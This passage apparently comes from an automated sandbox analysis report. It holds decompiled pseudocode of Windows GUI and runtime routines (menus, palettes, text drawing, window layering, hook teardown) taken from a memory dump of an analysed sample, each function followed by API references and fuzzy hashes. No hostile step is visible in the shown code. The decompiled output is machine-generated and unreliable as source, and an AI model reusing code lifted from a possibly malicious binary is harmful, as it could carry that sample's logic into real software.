					*0x463718 = 0;
					_t58 = VirtualFree(_t89, 0, 0x8000);
					__eflags = _t58 - 1;
					asm("sbb eax, eax");
					return _t58;
				}
			} else {
				*(_t87 - 4) = _t69 + 3;
				*(_t87 - 8 + _t69) = _t69;
				E004015FC(_t87, _t76, _t69);
				*0x463718 = 0;
				__eflags = 0;
				return 0;
			}
		} else {
			__eflags = __eax;
			*(__edx + 8) = __ecx;
			*(__ecx - 4) = __eax;
			if(__eflags == 0) {
				__ecx = *(__ebx + 4);
				*(__edx + 0x14) = __ebx;
				*(__edx + 4) = __ecx;
				*(__ecx + 0x14) = __edx;
				*(__ebx + 4) = __edx;
				*__ebx = 0;
				__eax = 0;
				__eflags = 0;
				_pop(__ebx);
				return 0;
			} else {
				__eax = 0;
				__eflags = 0;
				*__ebx = __al;
				_pop(__ebx);
				return 0;
			}
		}
	}
}

                                                                            APIs
                                                                            • Sleep.KERNEL32(00000000,?,?,00000000,004020E0), ref: 00401C13
                                                                            • Sleep.KERNEL32(0000000A,00000000,?,?,00000000,004020E0), ref: 00401C2D
                                                                            Memory Dump Source
                                                                            • Source File: 00000006.00000002.334161583.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000006.00000002.334148520.0000000000400000.00000002.00020000.sdmp
                                                                            • Associated: 00000006.00000002.334267038.0000000000461000.00000004.00020000.sdmp
                                                                            • Associated: 00000006.00000002.334281661.0000000000468000.00000008.00020000.sdmp
                                                                            • Associated: 00000006.00000002.334295803.000000000046C000.00000002.00020000.sdmp
                                                                            Similarity
                                                                            • API ID: Sleep
                                                                            • String ID:
                                                                            • API String ID: 3472027048-0
                                                                            • Opcode ID: 1e7206aa02f44caa39bbd2ffb76f0b3617e92c3f79faf1de15c14edde19f57f3
                                                                            • Instruction ID: 15b0095f43085506295c4366a214112c8c682c56cb7411fb19f3a5050c217c1f
                                                                            • Opcode Fuzzy Hash: 1e7206aa02f44caa39bbd2ffb76f0b3617e92c3f79faf1de15c14edde19f57f3
                                                                            • Instruction Fuzzy Hash: E151F3B12043809FE715CF28C984716BBD0AF45315F2881BFE444AB3E2E7B8D945C79A
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 87%
E004303E4(void* __eax, void* __ebx, intOrPtr __ecx, intOrPtr __edx, void* __edi, void* __esi, int _a4, char _a8, struct tagRECT* _a12) {
	int _v8;
	intOrPtr _v12;
	intOrPtr _v16;
	struct tagRECT _v32;
	void* _t53;
	CHAR* _t63;
	void* _t74;
	void* _t76;
	CHAR* _t87;
	int _t113;
	intOrPtr _t123;
	void* _t135;
	int _t136;
	int _t137;
	int _t139;
	int* _t140;
	void* _t144;
	char _t153;

	_t116 = __ecx;
	_t143 = _t144;
	_v8 = 0;
	_v16 = __ecx;
	_v12 = __edx;
	_t135 = __eax;
	_t113 = _a4;
	_push(_t144);
	_push(0x4305d0);
	_push(*[fs:eax]);
	*[fs:eax] = _t144 + 0xffffffe4;
	_t53 = E00432460(__eax);
	_t131 = _t53;
	if(_t53 != 0 && E00433CE0(_t131) != 0) {
		if((_t113 & 0x00000000) != 0) {
			__eflags = (_t113 & 0x00000002) - 2;
			if((_t113 & 0x00000002) == 2) {
				_t113 = _t113 & 0xfffffffd;
				__eflags = _t113;
			}
		} else {
			_t113 = _t113 & 0xffffffff | 0x00000002;
		}
		_t113 = _t113 | 0x00020000;
	}
	E004047D4(&_v8, _v16);
	if((_t113 & 0x00000004) == 0) {
		L12:
		E00404B4C(_v8, 0x4305f4);
		if(_t153 != 0) {
			E004262A4(*((intOrPtr*)(_v12 + 0x14)), _t116, 1, _t131, _t143, __eflags);
			__eflags = *((char*)(_t135 + 0x3a));
			if(*((char*)(_t135 + 0x3a)) != 0) {
				_t132 = *((intOrPtr*)(_v12 + 0xc));
				__eflags = E00425C4C(*((intOrPtr*)(_v12 + 0xc))) | *0x4305f8;
				E00425C58(*((intOrPtr*)(_v12 + 0xc)), E00425C4C(*((intOrPtr*)(_v12 + 0xc))) | *0x4305f8, _t132, _t135, _t143);
			}
			__eflags = *((char*)(_t135 + 0x39));
			if(*((char*)(_t135 + 0x39)) != 0) {
				L26:
				_t136 = _v8;
				__eflags = _t136;
				if(_t136 != 0) {
					_t137 = _t136 - 4;
					__eflags = _t137;
					_t136 = *_t137;
				}
				_t63 = E00404C00(_v8);
				DrawTextA(E0042681C(_v12), _t63, _t136, _a12, _t113);
				L29:
				_pop(_t123);
				*[fs:eax] = _t123;
				_push(0x4305d7);
				return E0040473C(&_v8);
			} else {
				__eflags = _a8;
				if(_a8 == 0) {
					OffsetRect(_a12, 1, 1);
					E004258CC(*((intOrPtr*)(_v12 + 0xc)), 0xff000014);
					_t139 = _v8;
					__eflags = _t139;
					if(_t139 != 0) {
						_t140 = _t139 - 4;
						__eflags = _t140;
						_t139 = *_t140;
					}
					_t87 = E00404C00(_v8);
					DrawTextA(E0042681C(_v12), _t87, _t139, _a12, _t113);
					OffsetRect(_a12, 0xffffffff, 0xffffffff);
				}
				__eflags = _a8;
				if(_a8 == 0) {
					L25:
					E004258CC(*((intOrPtr*)(_v12 + 0xc)), 0xff000010);
				} else {
					_t74 = E00425400(0xff00000d);
					_t76 = E00425400(0xff000010);
					__eflags = _t74 - _t76;
					if(_t74 != _t76) {
						goto L25;
					}
					E004258CC(*((intOrPtr*)(_v12 + 0xc)), 0xff000014);
				}
				goto L26;
			}
		}
		if((_t113 & 0x00000004) == 0) {
			asm("movsd");
			asm("movsd");
			asm("movsd");
			asm("movsd");
			_v32.top = _v32.top + 4;
			DrawEdge(E0042681C(_v12), &_v32, 6, "true");
		}
		goto L29;
	} else {
		if(_v8 == 0) {
			L11:
			E00404A08(&_v8, 0x4305e8);
			goto L12;
		}
		if(*_v8 != 0x26) {
			goto L12;
		}
		_t153 = *((char*)(_v8 + 1));
		if(_t153 != 0) {
			goto L12;
		}
		goto L11;
	}
}


                                                                            APIs
                                                                            • DrawEdge.USER32(00000000,?,00000006,?), ref: 004304B3
                                                                            • OffsetRect.USER32(?,00000001,00000001), ref: 00430504
                                                                            • DrawTextA.USER32(00000000,00000000,?,?,?), ref: 0043053D
                                                                            • OffsetRect.USER32(?,000000FF,000000FF), ref: 0043054A
                                                                            • DrawTextA.USER32(00000000,00000000,?,?,?), ref: 004305B5
                                                                            Memory Dump Source
                                                                            • Source File: 00000006.00000002.334161583.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000006.00000002.334148520.0000000000400000.00000002.00020000.sdmp
                                                                            • Associated: 00000006.00000002.334267038.0000000000461000.00000004.00020000.sdmp
                                                                            • Associated: 00000006.00000002.334281661.0000000000468000.00000008.00020000.sdmp
                                                                            • Associated: 00000006.00000002.334295803.000000000046C000.00000002.00020000.sdmp
                                                                            Similarity
                                                                            • API ID: Draw$OffsetRectText$Edge
                                                                            • String ID:
                                                                            • API String ID: 3610532707-0
                                                                            • Opcode ID: a5c1db12bf0ac30249b93611e375069da9dd1bc870eb88bb1d58e4da80817d54
                                                                            • Instruction ID: 3dcdb83b52eea41a6f7c2ae4f71efb06fc793ff540cda049268810552e419287
                                                                            • Opcode Fuzzy Hash: a5c1db12bf0ac30249b93611e375069da9dd1bc870eb88bb1d58e4da80817d54
                                                                            • Instruction Fuzzy Hash: E451B770A00214AFDB10EB69C891B9FB7A5AF08324F55526BF914A7392C77CEE408B59
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 100%
E00430224(int __eax, void* __edx) {
    void* __edi;
    void* __esi;
    signed int _t39;
    signed int _t40;
    intOrPtr _t44;
    int _t45;
    void* _t47;
    int _t48;
    intOrPtr* _t49;

    _t18 = __eax;
    _t49 = __eax;
    if(( *(__eax + 0x1c) & 0x00000008) == 0) {
        if(( *(__eax + 0x1c) & 0x00000002) != 0) {
            *((char*)(__eax + 0x74)) = 1;
            return __eax;
        }
        _t19 =  *((intOrPtr*)(__eax + 0x6c));
        if( *((intOrPtr*)(__eax + 0x6c)) != 0) {
            return E00430224(_t19, __edx);
        }
        _t18 = GetMenuItemCount(E00430354(__eax, _t45, _t47));
        _t48 = _t18;
        _t40 = _t39 & 0xffffff00 | _t48 == 0x00000000;
        while(_t48 > 0) {
            _t45 = _t48 - 1;
            _t18 = GetMenuState(E00430354(_t49, _t45, _t48), _t45, 0x400);
            if((_t18 & 0x00000004) == 0) {
                _t18 = RemoveMenu(E00430354(_t49, _t45, _t48), _t45, 0x400);
                _t40 = 1;
            }
            _t48 = _t48 - 1;
        }
        if(_t40 != 0) {
            if( *((intOrPtr*)(_t49 + 0x64)) != 0) {
                L14:
                E004300E4(_t49, _t45, _t48);
                L15:
                return  *((intOrPtr*)( *_t49 + 0x3c))();
            }
            _t44 =  *0x42eccc; // 0x42ed18
            if(E00403AB4( *((intOrPtr*)(_t49 + 0x70)), _t44) == 0 || GetMenuItemCount(E00430354(_t49, _t45, _t48)) != 0) {
                goto L14;
            } else {
                DestroyMenu( *(_t49 + 0x34));
                *(_t49 + 0x34) = 0;
                goto L15;
            }
        }
    }
    return _t18;
}


                                                                            Memory Dump Source
                                                                            • Source File: 00000006.00000002.334161583.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000006.00000002.334148520.0000000000400000.00000002.00020000.sdmp
                                                                            • Associated: 00000006.00000002.334267038.0000000000461000.00000004.00020000.sdmp
                                                                            • Associated: 00000006.00000002.334281661.0000000000468000.00000008.00020000.sdmp
                                                                            • Associated: 00000006.00000002.334295803.000000000046C000.00000002.00020000.sdmp
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 6868910fa89a8018b263f99a25884595e32ff1315658f09768cdbd9cf83d8de8
                                                                            • Instruction ID: a3695b4b82a7dda22394f8c72c2d1be36efbcd0d540cfdc55166254eebed839c
                                                                            • Opcode Fuzzy Hash: 6868910fa89a8018b263f99a25884595e32ff1315658f09768cdbd9cf83d8de8
                                                                            • Instruction Fuzzy Hash: E511A521B002495ADB20AA7B8929B5B27885F4970CF0422ABBD11A7393CA3CCC09C75C
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 100%
E004297F8(int __eax) {
    int _t21;
    signed int _t29;
    char _t34;
    int _t42;
    int _t43;
    struct HDC__* _t44;
    intOrPtr _t45;

    _t21 = __eax;
    _t42 = __eax;
    _t45 =  *((intOrPtr*)(__eax + 0x28));
    if( *((char*)(__eax + 0x30)) == 0 &&  *(_t45 + 0x10) == 0 &&  *((intOrPtr*)(_t45 + 0x14)) != 0) {
        _t22 =  *((intOrPtr*)(_t45 + 0x14));
        if( *((intOrPtr*)(_t45 + 0x14)) ==  *((intOrPtr*)(_t45 + 8))) {
            E0042824C(_t22);
        }
        _t21 = E0042730C( *((intOrPtr*)(_t45 + 0x14)), 1 << ( *(_t45 + 0x3e) & 0x0000ffff));
        _t43 = _t21;
        *(_t45 + 0x10) = _t43;
        if(_t43 == 0) {
            _t44 = E00426C14(GetDC(0));
            if( *((char*)(_t45 + 0x71)) != 0) {
                L9:
                _t34 = 1;
            } else {
                _t29 = GetDeviceCaps(_t44, 0xc);
                if(_t29 * GetDeviceCaps(_t44, 0xe) < ( *(_t45 + 0x2a) & 0x0000ffff) * ( *(_t45 + 0x28) & 0x0000ffff)) {
                    goto L9;
                } else {
                    _t34 = 0;
                }
            }
            *((char*)(_t45 + 0x71)) = _t34;
            if(_t34 != 0) {
                *(_t45 + 0x10) = CreateHalftonePalette(_t44);
            }
            _t21 = ReleaseDC(0, _t44);
            if( *(_t45 + 0x10) == 0) {
                *((char*)(_t42 + 0x30)) = 1;
                return _t21;
            }
        }
    }
    return _t21;
}


                                                                            APIs
                                                                            • GetDC.USER32(00000000), ref: 0042984E
                                                                            • GetDeviceCaps.GDI32(00000000,0000000C), ref: 00429863
                                                                            • GetDeviceCaps.GDI32(00000000,0000000E), ref: 0042986D
                                                                            • CreateHalftonePalette.GDI32(00000000,00000000,?,?,?,?,00428423,00000000,004284AF), ref: 00429891
                                                                            • ReleaseDC.USER32 ref: 0042989C
                                                                            Memory Dump Source
                                                                            • Source File: 00000006.00000002.334161583.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000006.00000002.334148520.0000000000400000.00000002.00020000.sdmp
                                                                            • Associated: 00000006.00000002.334267038.0000000000461000.00000004.00020000.sdmp
                                                                            • Associated: 00000006.00000002.334281661.0000000000468000.00000008.00020000.sdmp
                                                                            • Associated: 00000006.00000002.334295803.000000000046C000.00000002.00020000.sdmp
                                                                            Similarity
                                                                            • API ID: CapsDevice$CreateHalftonePaletteRelease
                                                                            • String ID:
                                                                            • API String ID: 2404249990-0
                                                                            • Opcode ID: 3865229444c542543eb940fc4c11deb8b2b846e1a53becbdafc0675224900ef4
                                                                            • Instruction ID: ad4f96e05be2536000db3a933fed08fd47ceb8b130526fe63b94d72f1acf08c5
                                                                            • Opcode Fuzzy Hash: 3865229444c542543eb940fc4c11deb8b2b846e1a53becbdafc0675224900ef4
                                                                            • Instruction Fuzzy Hash: DD11B4217152B99AEB24FF25A8817EE36D0AF42355F48012BFC406B2C1D7B98C94C2B9
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 88%
E00453CD8(void* __eax) {
    void* _t16;
    void* _t38;
    signed int _t40;

    _t16 = __eax;
    _t38 = __eax;
    if(( *(__eax + 0x1c) & 0x00000010) == 0 &&  *0x4626bc != 0) {
        _t16 = E004426F4(__eax);
        if(_t16 != 0) {
            _t40 = GetWindowLongA(E004423F8(_t38), 0xffffffec);
            if( *(_t38 + 0x328) != 0 ||  *(_t38 + 0x350) != 0) {
                if((_t40 & 0x00080000) == 0) {
                    SetWindowLongA(E004423F8(_t38), 0xffffffec, _t40 | 0x00080000);
                }
                return  *0x4626bc(E004423F8(_t38),  *((intOrPtr*)(_t38 + 0x354)),  *(_t38 + 0x329) & 0x000000ff,  *(0x46274c + ( *(_t38 + 0x328) & 0x000000ff) * 4) |  *(0x462754 + ( *(_t38 + 0x350) & 0x000000ff) * 4));
            } else {
                SetWindowLongA(E004423F8(_t38), 0xffffffec, _t40 & 0xfff7ffff);
                return RedrawWindow(E004423F8(_t38), 0, 0, 0x485);
            }
        }
    }
    return _t16;
}


                                                                            APIs
                                                                            • GetWindowLongA.USER32 ref: 00453D0C
                                                                            • SetWindowLongA.USER32(00000000,000000EC,00000000), ref: 00453D3E
                                                                            • SetLayeredWindowAttributes.USER32(00000000,?,?,00000000,00000000,000000EC,?,?,0045143C), ref: 00453D77
                                                                            • SetWindowLongA.USER32(00000000,000000EC,00000000), ref: 00453D90
                                                                            • RedrawWindow.USER32(00000000,00000000,00000000,00000485,00000000,000000EC,00000000,00000000,000000EC,?,?,0045143C), ref: 00453DA6
                                                                            Memory Dump Source
                                                                            • Source File: 00000006.00000002.334161583.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000006.00000002.334148520.0000000000400000.00000002.00020000.sdmp
                                                                            • Associated: 00000006.00000002.334267038.0000000000461000.00000004.00020000.sdmp
                                                                            • Associated: 00000006.00000002.334281661.0000000000468000.00000008.00020000.sdmp
                                                                            • Associated: 00000006.00000002.334295803.000000000046C000.00000002.00020000.sdmp
                                                                            Similarity
                                                                            • API ID: Window$Long$AttributesLayeredRedraw
                                                                            • String ID:
                                                                            • API String ID: 1758778077-0
                                                                            • Opcode ID: a167b8226a367de4a078897bccef434779ea8f70462ce2f86b559be6c3f23891
                                                                            • Instruction ID: 2f97fc831ddea0b8c0e421ebb8e19b8b50e61007e8c28567c32a4e0cf3139f72
                                                                            • Opcode Fuzzy Hash: a167b8226a367de4a078897bccef434779ea8f70462ce2f86b559be6c3f23891
                                                                            • Instruction Fuzzy Hash: 06110160A047902BDB11AF794D85F5626BC1B0536BF0805BABC55EA2C3CAACCA0CC768
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 70%
                                                                                                                                  E00427274(void* __eax) { 				signed int _v5; 				struct HDC__* _v12; 				struct HPALETTE__* _t21; 				struct HPALETTE__* _t25; 				void* _t28; 				intOrPtr _t35; 				void* _t37; 				void* _t39; 				intOrPtr _t40;  				_t37 = _t39; 				_t40 = _t39 + 0xfffffff8; 				_t28 = __eax; 				_v5 = 0; 				if( *0x46634c == 0) { 					return _v5 & 0x000000ff; 				} else { 					_v12 = GetDC(0); 					_push(_t37); 					_push(0x4272fa); 					_push( *[fs:edx]); 					 *[fs:edx] = _t40; 					if(GetDeviceCaps(_v12, 0x68) >= 0x10) { 						_t21 =  *0x46634c; // 0x65080609 						GetPaletteEntries(_t21, 0, 8, _t28 + 4); 						_t25 =  *0x46634c; // 0x65080609 						GetPaletteEntries(_t25, 8, 8, _t28 + ( *(_t28 + 2) & 0x0000ffff) * 4 - 0x1c); 						_v5 = 1; 					} 					_pop(_t35); 					 *[fs:eax] = _t35; 					_push(0x427301); 					return ReleaseDC(0, _v12); 				} 			}                        


                                                                            APIs
                                                                            • GetDC.USER32(00000000), ref: 0042728C
                                                                            • GetDeviceCaps.GDI32(?,00000068), ref: 004272A8
                                                                            • GetPaletteEntries.GDI32(65080609,00000000,00000008,?), ref: 004272C0
                                                                            • GetPaletteEntries.GDI32(65080609,00000008,00000008,?), ref: 004272D8
                                                                            • ReleaseDC.USER32 ref: 004272F4
                                                                            Memory Dump Source
                                                                            • Source File: 00000006.00000002.334161583.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000006.00000002.334148520.0000000000400000.00000002.00020000.sdmp
                                                                            • Associated: 00000006.00000002.334267038.0000000000461000.00000004.00020000.sdmp
                                                                            • Associated: 00000006.00000002.334281661.0000000000468000.00000008.00020000.sdmp
                                                                            • Associated: 00000006.00000002.334295803.000000000046C000.00000002.00020000.sdmp
                                                                            Similarity
                                                                            • API ID: EntriesPalette$CapsDeviceRelease
                                                                            • String ID:
                                                                            • API String ID: 3128150645-0
                                                                            • Opcode ID: ac1bfe70cc136cd0b1c148b7d32caf684ac8a85d6e8810b4e931f31978cb02c9
                                                                            • Instruction ID: fcbf177f7b8efaa1d200cff961121ff1be4b86295971eaf25a38603dbf7197bd
                                                                            • Opcode Fuzzy Hash: ac1bfe70cc136cd0b1c148b7d32caf684ac8a85d6e8810b4e931f31978cb02c9
                                                                            • Instruction Fuzzy Hash: C1112B3164C304BEFB04DBE59C42F6D77E8E705704F41C0AAFA44EA2C1DABA9444C729
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 64%
                                                                                                                                  E0040BBE0(void* __esi, void* __eflags) { 				char _v8; 				intOrPtr* _t18; 				intOrPtr _t26; 				void* _t27; 				long _t29; 				intOrPtr _t32; 				void* _t33;  				_t33 = __eflags; 				_push(0); 				_push(_t32); 				_push(0x40bc77); 				_push( *[fs:eax]); 				 *[fs:eax] = _t32; 				E0040B954(GetThreadLocale(), 0x40bc8c, 0x100b,  &_v8); 				_t29 = E00408B44(0x40bc8c, 1, _t33); 				if(_t29 + 0xfffffffd - 3 < 0) { 					EnumCalendarInfoA(E0040BB2C, GetThreadLocale(), _t29, 4); 					_t27 = 7; 					_t18 = 0x4658f4; 					do { 						 *_t18 = 0xffffffff; 						_t18 = _t18 + 4; 						_t27 = _t27 - 1; 					} while (_t27 != 0); 					EnumCalendarInfoA(E0040BB68, GetThreadLocale(), _t29, 3); 				} 				_pop(_t26); 				 *[fs:eax] = _t26; 				_push(E0040BC7E); 				return E0040473C( &_v8); 			}                        


                                                                            APIs
                                                                            • GetThreadLocale.KERNEL32(?,00000000,0040BC77,?,?,00000000), ref: 0040BBF8
                                                                              • Part of subcall function 0040B954: GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 0040B972
                                                                            • GetThreadLocale.KERNEL32(00000000,00000004,00000000,0040BC77,?,?,00000000), ref: 0040BC28
                                                                            • EnumCalendarInfoA.KERNEL32(Function_0000BB2C,00000000,00000000,00000004), ref: 0040BC33
                                                                            • GetThreadLocale.KERNEL32(00000000,00000003,00000000,0040BC77,?,?,00000000), ref: 0040BC51
                                                                            • EnumCalendarInfoA.KERNEL32(Function_0000BB68,00000000,00000000,00000003), ref: 0040BC5C
                                                                            Memory Dump Source
                                                                            • Source File: 00000006.00000002.334161583.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000006.00000002.334148520.0000000000400000.00000002.00020000.sdmp
                                                                            • Associated: 00000006.00000002.334267038.0000000000461000.00000004.00020000.sdmp
                                                                            • Associated: 00000006.00000002.334281661.0000000000468000.00000008.00020000.sdmp
                                                                            • Associated: 00000006.00000002.334295803.000000000046C000.00000002.00020000.sdmp
                                                                            Similarity
                                                                            • API ID: Locale$InfoThread$CalendarEnum
                                                                            • String ID:
                                                                            • API String ID: 4102113445-0
                                                                            • Opcode ID: 97d354d8b6cdc2396397ecc49eed239671b501c3797063cbf2a75c35dab51ed0
                                                                            • Instruction ID: 22d4ad3a48fad1cbf9e27e67077bea737ce6d0b3631ad7d1c133fb8823499fa8
                                                                            • Opcode Fuzzy Hash: 97d354d8b6cdc2396397ecc49eed239671b501c3797063cbf2a75c35dab51ed0
                                                                            • Instruction Fuzzy Hash: 7E012F717442446BE601B7758D03F2A366CDB86718F61403BB900FA6C9DB3CAE1086AC
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 100%
                                                                                                                                  E00455410() { 				void* _t2; 				void* _t5; 				void* _t8; 				struct HHOOK__* _t10;  				if( *0x466598 != 0) { 					_t10 =  *0x466598; // 0x0 					UnhookWindowsHookEx(_t10); 				} 				 *0x466598 = 0; 				if( *0x46659c != 0) { 					_t2 =  *0x466594; // 0x0 					SetEvent(_t2); 					if(GetCurrentThreadId() !=  *0x466590) { 						_t8 =  *0x46659c; // 0x0 						WaitForSingleObject(_t8, 0xffffffff); 					} 					_t5 =  *0x46659c; // 0x0 					CloseHandle(_t5); 					 *0x46659c = 0; 					return 0; 				} 				return 0; 			}                        


                                                                            APIs
                                                                            • UnhookWindowsHookEx.USER32(00000000), ref: 0045541F
                                                                            • SetEvent.KERNEL32(00000000,00457DAE,00000000,00456B7B,?,?,00460C02,00000001,00456D41,?,00000000,00000000,00000000,00000001), ref: 0045543A
                                                                            • GetCurrentThreadId.KERNEL32 ref: 0045543F
                                                                            • WaitForSingleObject.KERNEL32(00000000,000000FF,00000000,00457DAE,00000000,00456B7B,?,?,00460C02,00000001,00456D41,?,00000000,00000000,00000000,00000001), ref: 00455454
                                                                            • CloseHandle.KERNEL32(00000000,00000000,00457DAE,00000000,00456B7B,?,?,00460C02,00000001,00456D41,?,00000000,00000000,00000000,00000001), ref: 0045545F
                                                                            Memory Dump Source
                                                                            • Source File: 00000006.00000002.334161583.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000006.00000002.334148520.0000000000400000.00000002.00020000.sdmp
                                                                            • Associated: 00000006.00000002.334267038.0000000000461000.00000004.00020000.sdmp
                                                                            • Associated: 00000006.00000002.334281661.0000000000468000.00000008.00020000.sdmp
                                                                            • Associated: 00000006.00000002.334295803.000000000046C000.00000002.00020000.sdmp
                                                                            Similarity
                                                                            • API ID: CloseCurrentEventHandleHookObjectSingleThreadUnhookWaitWindows
                                                                            • String ID:
                                                                            • API String ID: 2429646606-0
                                                                            • Opcode ID: 8d4b083acdc61fb605ee7809ee2f04c3fef8837cea9ec92acbb126d3f3c8ffb3
                                                                            • Instruction ID: c8276ee7c81c26c9bfae65dd25605525a1fe353da67a80127bb571263e38ba24
                                                                            • Opcode Fuzzy Hash: 8d4b083acdc61fb605ee7809ee2f04c3fef8837cea9ec92acbb126d3f3c8ffb3
                                                                            • Instruction Fuzzy Hash: 50F0F870510580BACA10EF69BC47B1532E4A70D316B124A3AF00AD71EBE7B9B484CF1E
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 84%
                                                                                                                                  E00458030(char __eax, void* __ebx, void* __edx, void* __edi, void* __esi) { 				char _v8; 				intOrPtr _v12; 				char _v16; 				intOrPtr _v20; 				struct HWND__* _v24; 				intOrPtr _v28; 				char _v32; 				struct tagRECT _v48; 				intOrPtr _v52; 				intOrPtr _v56; 				int _v60; 				int _v64; 				intOrPtr _v68; 				char _v72; 				int _v76; 				char _v80; 				intOrPtr _v84; 				intOrPtr _v88; 				struct tagPOINT _v96; 				char _v97; 				struct tagRECT _v113; 				char _v132; 				intOrPtr _v136; 				char _v140; 				char _v144; 				char _v148; 				struct HWND__* _t131; 				void* _t145; 				struct HWND__* _t167; 				intOrPtr _t188; 				char _t194; 				intOrPtr _t218; 				intOrPtr _t222; 				void* _t238; 				intOrPtr* _t250; 				intOrPtr _t269; 				intOrPtr _t271; 				intOrPtr _t276; 				struct tagRECT* _t298; 				intOrPtr* _t302; 				intOrPtr _t303; 				void* _t310;  				_t309 = _t310; 				_push(__ebx); 				_push(__esi); 				_push(__edi); 				_t251 = 0; 				_v144 = 0; 				_v148 = 0; 				asm("movsd"); 				asm("movsd"); 				_v8 = __eax; 				_t268 =  *0x44c7e8; // 0x44c7ec 				E004051D8( &_v72, _t268); 				_t250 =  &_v8; 				_push(_t310); 				_push(0x4583b7); 				_push( *[fs:eax]); 				 *[fs:eax] = _t310 + 0xffffff70; 				 *((char*)( *_t250 + 0x58)) = 0; 				_v24 = 0; 				if( *((char*)( *_t250 + 0x88)) == 0 ||  *((intOrPtr*)( *_t250 + 0x60)) == 0 || E0044CBE4() == 0) { 					L23: 					_t131 = _v24; 					__eflags = _t131; 					if(_t131 <= 0) { 						L00457D90( *_t250, _t251, _t268); 					} else { 						E00457B58( *_t250, 0, _t131); 					} 					goto L26; 				} else { 					_t145 = E00455288(E00438F94( &_v80, 1)); 					_t268 =  *_t250; 					if(_t145 !=  *((intOrPtr*)( *_t250 + 0x60))) { 						goto L23; 					} else { 						_v72 =  *((intOrPtr*)( *_t250 + 0x60)); 						_v64 = _v80; 						_v60 = _v76; 						_v60 = _v60 + E00457DC8(); 						_v56 = 
E00454604(); 						_v52 =  *((intOrPtr*)( *_t250 + 0x5c)); 						E0043A33C( *((intOrPtr*)( *_t250 + 0x60)),  &_v132); 						_t298 =  &_v48; 						asm("movsd"); 						asm("movsd"); 						asm("movsd"); 						asm("movsd"); 						 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *_t250 + 0x60)))) + 0x40))(); 						_v96.x = 0; 						_v96.y = 0; 						_t302 =  *((intOrPtr*)( *((intOrPtr*)( *_t250 + 0x60)) + 0x30)); 						_t316 = _t302; 						if(_t302 == 0) { 							_t303 =  *((intOrPtr*)( *_t250 + 0x60)); 							_t276 =  *0x4369e8; // 0x436a34 							_t167 = E00403AB4(_t303, _t276); 							__eflags = _t167; 							if(_t167 != 0) { 								__eflags =  *(_t303 + 0x1c4); 								if( *(_t303 + 0x1c4) != 0) { 									ClientToScreen( *(_t303 + 0x1c4),  &_v96); 								} 							} 						} else { 							 *((intOrPtr*)( *_t302 + 0x40))(); 						} 						OffsetRect( &_v48, _v96.x - _v88, _v96.y - _v84); 						E0043A55C( *((intOrPtr*)( *_t250 + 0x60)),  &_v140,  &_v80); 						_v32 = _v140; 						_v28 = _v136; 						E00455250( *((intOrPtr*)( *_t250 + 0x60)),  &_v148); 						E004376EC(_v148,  &_v140,  &_v144, _t316); 						E004047D4( &_v16, _v144); 						_v20 =  *((intOrPtr*)( *_t250 + 0x74)); 						_t188 =  *0x4626b8; // 0x436fb0 						_v68 = _t188; 						_v12 = 0; 						_t251 = 0; 						_v97 = E0043BC9C( *((intOrPtr*)( *_t250 + 0x60)), 0, 0xb030,  &_v72) == 0; 						if(_v97 != 0 &&  *((short*)( *_t250 + 0x15a)) != 0) { 							_t251 =  &_v97; 							 *((intOrPtr*)( *_t250 + 0x158))( &_v72); 						} 						if(_v97 == 0 ||  *((intOrPtr*)( *_t250 + 0x60)) == 0) { 							_t194 = 0; 						} else { 							_t194 = 1; 						} 						_t268 =  *_t250; 						 *((char*)( *_t250 + 0x58)) = _t194; 						if( *((char*)( *_t250 + 0x58)) == 0) { 							goto L23; 						} else { 							_t323 = _v16; 							if(_v16 == 0) { 								goto L23; 							} 							L00457F20(_v68, _t268, _t309); 							 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *_t250 + 0x84)))) + 0x74))(); 							 *((intOrPtr*)( *((intOrPtr*)( 
